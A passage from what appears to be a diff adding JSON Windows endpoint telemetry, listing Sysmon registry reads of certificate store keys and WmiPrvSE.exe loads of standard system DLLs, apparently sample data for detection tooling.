"registry_value": "CTLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WmiPrvSE.exe", + "image_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488700016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "fastprox.dll", + "image_path": "C:\\Windows\\System32\\wbem\\fastprox.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "wbemcomn.dll", + "image_path": "C:\\Windows\\System32\\wbemcomn.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem", + "registry_value": "Wbem", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem", + "registry_value": "Wbem", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ncobjapi.dll", + "image_path": "C:\\Windows\\System32\\ncobjapi.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "wbemprox.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wbemprox.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489170000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489170000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "wbemsvc.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wbemsvc.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489170000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "wmiutils.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wmiutils.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": 